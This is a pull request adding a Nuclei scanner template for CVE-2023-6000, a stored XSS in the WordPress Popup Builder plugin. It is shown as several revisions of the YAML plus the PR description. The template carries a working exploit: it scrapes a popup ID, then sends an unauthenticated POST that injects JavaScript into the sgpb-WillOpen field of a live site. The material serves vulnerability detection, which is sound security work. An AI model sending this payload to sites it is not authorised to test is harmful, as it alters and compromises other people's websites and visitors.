### PR TITLE
Add CVE-2023-6000 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-6000.yaml
+++ b/http/cves/2023/CVE-2023-6000.yaml
@@ -1,11 +1,12 @@
 id: CVE-2023-6000
 
 info:
-  name: WordPress Popup Builder <= 4.2.3 - Stored XSS
+  name: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS
   author: riteshs4hu
   severity: medium
   description: |
     The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
+  remediation: Fixed in 4.2.3
   reference:
     - https://wordpress.org/plugins/popup-builder/
     - https://nvd.nist.gov/vuln/detail/cve-2023-6000
@@ -29,6 +30,8 @@ info:
     publicwww-query: "/wp-content/plugins/popup-builder/"
   tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive
 
+flow: http(1) && http(2)
+
 http:
   - raw:
       - |
@@ -49,9 +52,12 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        sgpb-is-preview=1&post_ID=950&sgpb-type=html&sgpb-WillOpen=alert('document.domain');
+        sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');
 
     matchers:
-      - type: word
-        words:
-          - alert('document.domain')
+      - type: dsl
+        dsl:
+          - contains_all(body, 'alert(\'document.domain\')', 'popup-builder')
+          - contains(content_type, "text/html")
+          - status_code == 200
+        condition: and

--- a/http/cves/2023/CVE-2023-6000.yaml
+++ b/http/cves/2023/CVE-2023-6000.yaml
@@ -1,0 +1,34 @@
+id: CVE-2023-6000
+
+info:
+  name: WordPress Popup Builder - Stored XSS Test
+  author: riteshs4hu
+  severity: medium
+  description: |
+    Stored XSS vulnerability in the WordPress Popup Builder plugin (< 4.2.3).
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    extractors:
+      - type: regex
+        name: popup_id
+        regex:
+          - 'sgpb-main-popup-data-container-([0-9]+)'
+        group: 1
+        internal: true
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('test');
+
+    matchers:
+      - type: word
+        words:
+          - "alert('test')"

--- a/http/cves/2023/CVE-2023-6000.yaml
+++ b/http/cves/2023/CVE-2023-6000.yaml
@@ -5,46 +5,53 @@ info:
   author: riteshs4hu
   severity: medium
   description: |
-    The WordPress Popup Builder plugin versions before 4.2.3 are vulnerable to a stored XSS.
+    The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
   reference:
-    - https://github.com/RonF98/CVE-2023-6000-POC
     - https://wordpress.org/plugins/popup-builder/
     - https://nvd.nist.gov/vuln/detail/cve-2023-6000
     - https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8/
+    - https://github.com/rxerium/CVE-2023-6000
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2023-6000
     cwe-id: CWE-79
-    epss-score: 0.0021
-    epss-percentile: 0.4321
+    epss-score: 0.08882
+    epss-percentile: 0.9211
+    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2023,wordpress,wp-plugin,wp,xss
+    vendor: sygnoos
+    product: popup_builder
+    framework: wordpress
+    fofa-query: body="/wp-content/plugins/popup-builder"
+    publicwww-query: "/wp-content/plugins/popup-builder/"
+  tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
 
     extractors:
       - type: regex
         name: popup_id
+        group: 1
         regex:
           - 'sgpb-main-popup-data-container-([0-9]+)'
-        group: 1
         internal: true
 
-  - method: POST
-    path:
-      - "{{BaseURL}}/"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('test');
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        sgpb-is-preview=1&post_ID=950&sgpb-type=html&sgpb-WillOpen=alert('document.domain');
 
     matchers:
       - type: word
         words:
-          - "alert('test')"
+          - alert('document.domain')

--- a/http/cves/2023/CVE-2023-6000.yaml
+++ b/http/cves/2023/CVE-2023-6000.yaml
@@ -1,11 +1,27 @@
 id: CVE-2023-6000
 
 info:
-  name: WordPress Popup Builder - Stored XSS Test
+  name: WordPress Popup Builder <= 4.2.3 - Stored XSS
   author: riteshs4hu
   severity: medium
   description: |
-    Stored XSS vulnerability in the WordPress Popup Builder plugin (< 4.2.3).
+    The WordPress Popup Builder plugin versions before 4.2.3 are vulnerable to a stored XSS. 
+  reference:
+    - https://github.com/RonF98/CVE-2023-6000-POC
+    - https://wordpress.org/plugins/popup-builder/
+    - https://nvd.nist.gov/vuln/detail/cve-2023-6000
+    - https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-6000
+    cwe-id: CWE-79
+    epss-score: 0.0021
+    epss-percentile: 0.4321
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,wordpress,wp-plugin,wp,xss
 
 http:
   - method: GET

--- a/http/cves/2023/CVE-2023-6000.yaml
+++ b/http/cves/2023/CVE-2023-6000.yaml
@@ -5,7 +5,7 @@ info:
   author: riteshs4hu
   severity: medium
   description: |
-    The WordPress Popup Builder plugin versions before 4.2.3 are vulnerable to a stored XSS. 
+    The WordPress Popup Builder plugin versions before 4.2.3 are vulnerable to a stored XSS.
   reference:
     - https://github.com/RonF98/CVE-2023-6000-POC
     - https://wordpress.org/plugins/popup-builder/


### PR DESCRIPTION
### Add CVE-2023-6000 (vKEVs)

CVE-2023-6000 is a Stored XSS vulnerability in the WordPress Popup Builder plugin (< 4.2.3). An attacker can inject malicious JavaScript into popups via admin-ajax.php, which executes whenever a visitor interacts with the popup.

- References: https://github.com/RonF98/CVE-2023-6000-POC?tab=readme-ov-file

### Template Validation
[validate.txt](https://github.com/user-attachments/files/22234146/validate.txt)

I've validated this template locally?
- [x] YES
- [ ] NO

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)